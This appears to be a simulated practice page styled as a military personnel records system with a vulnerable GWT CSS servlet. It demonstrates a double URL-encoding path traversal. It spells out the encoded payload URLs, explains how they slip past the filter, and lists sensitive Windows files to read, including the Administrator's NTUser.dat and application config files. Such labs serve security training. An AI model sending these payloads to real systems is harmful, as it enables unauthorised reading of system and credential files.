DoD Personnel Records System

GWT Static Resource Servlet — GwtCssServlet /gwtmain/*

Servlet Endpoint

// Normal CSS resource request https://████.mil/gwtmain//module_styles.css ← 200 text/css // Double URL encoding bypasses path filter // Encode: ../ → ..%2f → ..%252f (encode the % again) https://████.mil/gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts

How Double URL Encoding Bypasses the Filter

Attacker sends

..%252f

% encoded as %25
slash still hidden

→

Server decode #1

..%2f

%25 → %
no literal ../ — PASSES FILTER

→

Servlet decode #2

../

urldecode() %2f → /
TRAVERSAL ACTIVE

Send Request to GwtCssServlet

https://████.mil/128.php?path=inetpub/wwwroot/gwtmain/module_styles.css

Filter blocks: ../ (literal) · Try double-encoded: ..%252f..%252f..%252fwindows/System32/drivers/etc/hosts
Note: Browser address bar auto-decodes — use Burp Suite or the field above for raw %25 sequences.

Server Status

OSWindows Server 2008 R2

IIS7.5.7600

Java1.8.0_201

Tomcat8.5.38

GWT2.8.2

StatusRunning

AuthWindows Auth

Loaded GWT Modules

gwtmain personnel records reports gwt-user

CSS served from: C:\inetpub\wwwroot\gwtmain\

About GwtCssServlet

The GwtCssServlet serves static CSS resources for GWT modules. It maps URL paths to files on disk. The servlet applies urldecode() internally — creating a second URL decode pass when combined with the web server's decode.

Known Files (Windows)

windows/System32/drivers/etc/hosts

windows/System32/drivers/etc/services

Users/Administrator/NTUser.dat

inetpub/wwwroot/WEB-INF/web.xml

ProgramData/dod_app/config.ini